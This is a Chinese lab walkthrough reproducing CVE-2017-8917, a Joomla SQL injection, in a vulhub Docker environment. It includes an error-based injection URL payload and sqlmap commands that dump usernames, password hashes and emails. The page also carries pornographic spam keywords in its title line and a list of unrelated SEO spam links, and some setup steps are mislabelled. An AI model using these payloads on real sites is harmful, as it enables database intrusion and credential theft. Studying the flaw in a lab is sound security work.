中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

技術(shù)專業(yè)網(wǎng)站建設(shè)免費(fèi)的關(guān)鍵詞挖掘工具

技術(shù)專業(yè)網(wǎng)站建設(shè),免費(fèi)的關(guān)鍵詞挖掘工具,網(wǎng)站開發(fā)建設(shè)公司電話,網(wǎng)站建設(shè)合同付款約定文章目錄 搭建環(huán)境啟動(dòng)環(huán)境漏洞復(fù)現(xiàn)報(bào)錯(cuò)注入使用sqlmap 前提條件: 1.安裝docker docker pull medicean/vulapps:j_joomla_22.安裝docker-compose docker run -d -p 8000:80 medicean/vulapps:j_joomla_23.下載vulhub Docker Compose是 docker 提供的一個(gè)命令行工具&…

文章目錄

  • 搭建環(huán)境
  • 啟動(dòng)環(huán)境
  • 漏洞復(fù)現(xiàn)
    • 報(bào)錯(cuò)注入
    • 使用sqlmap

前提條件:

1.安裝docker

docker pull medicean/vulapps:j_joomla_2

2.安裝docker-compose

docker run -d -p 8000:80 medicean/vulapps:j_joomla_2

3.下載vulhub

Docker Compose是 docker 提供的一個(gè)命令行工具,用來定義和運(yùn)行由多個(gè)容器組成的應(yīng)用,而docker-compose.yml是它的配置文件。

搭建環(huán)境

進(jìn)入vulhb目錄下的joomla,復(fù)現(xiàn)CVE-2017-8917漏洞:

cd /home/kali/vulhub/joomla/CVE-2017-8917

查看docker-compose的配置文件:

cat docker-compose.yml

如圖,里面有兩個(gè)鏡像文件的信息,還有容器名字:

外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來直接上傳

然后使用下面命令,搭建docker-compose并啟動(dòng):

docker-compose up -d && docker-compose up -d

如圖:

外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來直接上傳

啟動(dòng)環(huán)境

環(huán)境搭建成功后,在瀏覽器中輸入本機(jī)地址加之前配置文件中的端口10.9.75.45:8080進(jìn)入Joomla環(huán)境:

外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來直接上傳

配置網(wǎng)站,輸入用戶名和密碼,密碼設(shè)為root,點(diǎn)擊下一步:

外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來直接上傳

配置數(shù)據(jù)庫賬戶密碼,輸入之前在配置文件中看到的數(shù)據(jù)庫信息,點(diǎn)擊下一步:

用戶:root
密碼:vulhub
數(shù)據(jù)庫名:joomla

外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機(jī)制,建議將圖片保存下來直接上傳

成功后點(diǎn)擊安裝,安裝成功后點(diǎn)擊刪除installation目錄(重要)

在這里插入圖片描述

漏洞復(fù)現(xiàn)

報(bào)錯(cuò)注入

環(huán)境啟動(dòng)成功后刷新,頁面跳轉(zhuǎn)并出現(xiàn)報(bào)錯(cuò)信息,這時(shí)候可以用SQL注入中的報(bào)錯(cuò)注入來獲取數(shù)據(jù)庫信息,在URL中輸入:

?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

成功回顯當(dāng)前用戶名:

在這里插入圖片描述

使用sqlmap

在kali中輸入下面命令,獲取數(shù)據(jù)庫名,注入點(diǎn)為list:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" --dbs

在彈出的交互式語句中直接回車,最后爆破出數(shù)據(jù)庫名:
在這里插入圖片描述

,輸入下面命令,查看Joomla數(shù)據(jù)庫中的表:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables

第一個(gè)交互選n,第二個(gè)直接回車,列出57個(gè)表名,其中比較重要的表示users:

在這里插入圖片描述

查看users表中的內(nèi)容:

–dump列表中指定列的內(nèi)容

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" -D joomla -T '#__users' -C username,password,email --dump 

成功獲得了用戶名、加密的密碼和之前輸入的郵箱:

在這里插入圖片描述

http://www.risenshineclean.com/news/54121.html

相關(guān)文章:

  • python前端開發(fā)北京網(wǎng)站seo哪家公司好
  • 保存的密碼變成亂碼搜索引擎優(yōu)化叫什么
  • 網(wǎng)站互動(dòng)功能網(wǎng)站推廣應(yīng)該怎么做?
  • 上海新聞網(wǎng)頭條新聞seo常用分析的專業(yè)工具
  • 微信如何建商城網(wǎng)站百度投放廣告怎么收費(fèi)
  • 杭州做網(wǎng)站外包公司哪家好優(yōu)化seo網(wǎng)站
  • 江門網(wǎng)站制作維護(hù)南昌seo公司
  • 政府網(wǎng)站的建設(shè)規(guī)劃設(shè)想seo關(guān)鍵詞排名優(yōu)化哪家好
  • 域名注冊(cè)了 如何做網(wǎng)站如何推廣app賺錢
  • 機(jī)械網(wǎng)站優(yōu)化百度推廣客戶端怎么登陸
  • 最新開的手游傳奇網(wǎng)站seo研究中心晴天
  • 集團(tuán)簡(jiǎn)介ppt優(yōu)秀范例百度網(wǎng)站怎么優(yōu)化排名
  • 怎樣做企業(yè)網(wǎng)站建設(shè)網(wǎng)站推廣與優(yōu)化平臺(tái)
  • 建設(shè)部網(wǎng)站公示公告安全seo推廣的全稱是
  • 怎樣開通網(wǎng)站網(wǎng)站開發(fā)的一般流程
  • 濟(jì)南 網(wǎng)站建設(shè)公司 醫(yī)療湖南關(guān)鍵詞排名推廣
  • 做oa好 還是做網(wǎng)站好網(wǎng)絡(luò)推廣的平臺(tái)有哪些
  • 臨沂市建設(shè)安全管理網(wǎng)站整合營銷的最高階段是
  • 網(wǎng)站首頁菜單欄表怎么做中國今天最新軍事新聞
  • 數(shù)據(jù)來源于網(wǎng)站需如何做腳注谷歌推廣怎么樣
  • 深圳營銷型網(wǎng)站建設(shè)公司本周的新聞大事10條
  • 服務(wù)器 打開網(wǎng)站iis7下載百度2023最新版
  • 西安做網(wǎng)站的公司排名西安seo托管
  • wordpress503原因seo短期課程
  • 創(chuàng)造網(wǎng)站黃頁污水
  • 正規(guī)的品牌網(wǎng)站建設(shè)服務(wù)軟件外包網(wǎng)
  • 品牌做網(wǎng)站公司長(zhǎng)沙網(wǎng)站seo服務(wù)
  • 成都網(wǎng)站制作公司有哪些百度公司怎么樣
  • 讀書網(wǎng)站建設(shè)策劃書摘要百度投訴熱線中心客服
  • 網(wǎng)站建設(shè)順序seo關(guān)鍵詞優(yōu)化軟件怎么樣